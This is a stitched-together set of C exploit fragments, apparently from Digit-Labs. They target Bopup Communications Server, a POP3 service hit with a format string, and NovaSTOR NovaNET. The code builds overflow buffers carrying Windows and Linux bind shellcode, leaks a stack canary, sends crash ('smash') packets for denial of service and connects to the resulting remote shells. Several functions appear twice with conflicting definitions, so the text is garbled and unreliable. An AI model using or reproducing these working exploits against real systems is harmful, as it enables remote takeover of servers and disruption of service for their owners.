int
main (int argc, char **argv)
{
char zbuf[BUF_SIZE];
int fd, n;
printf ("Bopup Communications Server remote SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
fd = sockami (argv[1], PORT_BOPUP);
if (fd == -1)
{
fprintf (stderr, "%s: sockami failed\n", argv[0]);
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n\n", argv[1], PORT_BOPUP);
printf ("** SEH offset @+%04X\n", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
printf ("** return addy @0x%08X\n\n", BOPUP_POPRET);
printf ("* building buffer with shellcode...");
zbuffami (zbuf);
printf ("done\n");
printf ("* sending request...");
if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN)
{
fprintf (stderr, "%s: sock_send returned %d (!= %d)\n",
argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN);
exit (EXIT_FAILURE);
}
printf ("done\n");
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (argv[1], PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
return (EXIT_SUCCESS);
}
static void formatme (u_char * host){ /* do the evil */
int sock;
printf ("+Connecting to %s:%d ", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
printf ("\n+Sending format string\n");
sock_send (sock, formatString, strlen (formatString));
fflush (stdout);
sleep(2);
printf ("+Connecting to Shell ");
sock = sockami (host, 31337);
printf ("- Done\n");
shell(sock);
}
static int
novanet_read (char *host, void *start, void *dst)
{
fd_set r_fds;
struct timeval tv;
int fd, n;
char buf[NOVANET_PKT_SZ], rbuf[NOVANET_PKT_SZ];
novanet_read_pkt_init (buf);
start = (void *) NOVANET_CALC_INT (start);
fd = sockami (host, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_read: sockami failed\n");
exit (EXIT_FAILURE);
}
NOVANET_SET_INT (buf, (unsigned int) start);
if ((n = sock_send (fd, buf, sizeof buf)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_read: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
return (0);
}
FD_ZERO (&r_fds);
FD_SET (fd, &r_fds);
tv.tv_sec = 4; /* wait 4 seconds */
tv.tv_usec = 0;
n = select (fd + 1, &r_fds, NULL, NULL, &tv);
if (n == -1)
{
fprintf (stderr, "novanet_read: select() - %s\n", strerror (errno));
exit (EXIT_FAILURE);
}
else if (n)
{
if ((n = sock_recv (fd, rbuf, sizeof rbuf)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_read: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
return (0);
}
}
else
{
fprintf (stderr, "novanet_read: select timeout, we may have crashed NovaNET :(\n");
exit (EXIT_FAILURE);
}
memcpy (dst, &rbuf[NOVANET_INT_IDX], sizeof (void *));
usleep (USLEEP_TIME);
close (fd);
return (1);
}
static void
novanet_read (char *host, void *start, void *end, int is_dos)
{
int sock, i, num_hits;
char buf[BUF_SIZE], rbuf[BUF_SIZE];
novanet_pkt_init (buf);
start = (void *) NOVANET_CALC_INT (start);
end = (void *) NOVANET_CALC_INT (end);
if (!is_dos)
printf ("start: %p end: %p\n", start, end);
num_hits = is_dos ? 1 : (end - start);
printf ("+hitting %s:%d. (%d times)\n", host, NOVANET_TCP_PORT, num_hits);
for (i = 0; i < num_hits; i++, start++)
{
sock = sockami (host, NOVANET_TCP_PORT);
if (sock == -1)
break;
NOVANET_SET_INT (buf, (is_dos ? NOVANET_CALC_INT (0xdeadbeef) : (unsigned int) start));
sock_send (sock, buf, sizeof buf);
if (!is_dos)
{
sock_recv (sock, rbuf, sizeof rbuf);
write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int));
usleep (USLEEP_TIME);
close (sock);
if (!((i + 1) % 8))
printf ("..%d", i + 1);
fflush (stdout);
}
}
printf ("\n");
}
static void
novanet_own_process (char *thost, char *d_name, int esp_val)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int canary_val, fd, n, rlen;
if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
{
fprintf (stderr, "novanet_own_process: reading canary failed\n");
exit (EXIT_FAILURE);
}
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
{
fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
*(unsigned int *) &ptr[0x108] = NTDLL_ESP;
memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
static void
novanet_get_domain (char *thost, char *d_name)
{
char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr;
int fd, n, rlen;
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_get_domain: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
printf ("** sending getdomain_buf packet...");
if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading first reply...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ);
printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name);
printf ("** sending ack packet...");
if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4)
{
fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ + 4);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading second reply...");
if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = *(unsigned int *) &rbuf_hdr[12];
if (rlen < NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n",
NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
rlen -= NOVANET_HDR_SZ;
printf ("** reading %d-remaining bytes...", rlen);
pkt_ptr = malloc (rlen * sizeof (char));
if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
printf ("done\n");
free (pkt_ptr);
printf ("** sending hup packet...");
if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
}
int
main (int argc, char **argv)
{
char rbuf_pkt[NOVANET_PKT_SZ];
unsigned int rlen;
int fd, n;
printf ("NovaSTOR NovaNET remote DoS\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc < 2)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
fd = sockami (argv[1], NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "main: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", argv[1], NOVANET_TCP_PORT);
printf ("** sending header packet...");
if ((n = sock_send (fd, hdr_pkt, sizeof hdr_pkt - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "main: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading first reply...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "main: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
srand (time (NULL));
rlen = NOVANET_MAX_LEN + (rand () % (UINT_MAX - NOVANET_MAX_LEN)) + 1;
*(unsigned int *) &rem_pkt[12] = rlen;
printf ("** sending smash packet [remaining length %u-bytes]...", rlen);
if ((n = sock_send (fd, rem_pkt, sizeof rem_pkt - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "main: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
usleep (USLEEP_TIME);
close (fd);
return (EXIT_SUCCESS);
}
static void
novanet_own_process (char *thost, char *d_name)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int fd, n, rlen;
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x138 + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x134] = NOVANET_POPRET;
memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
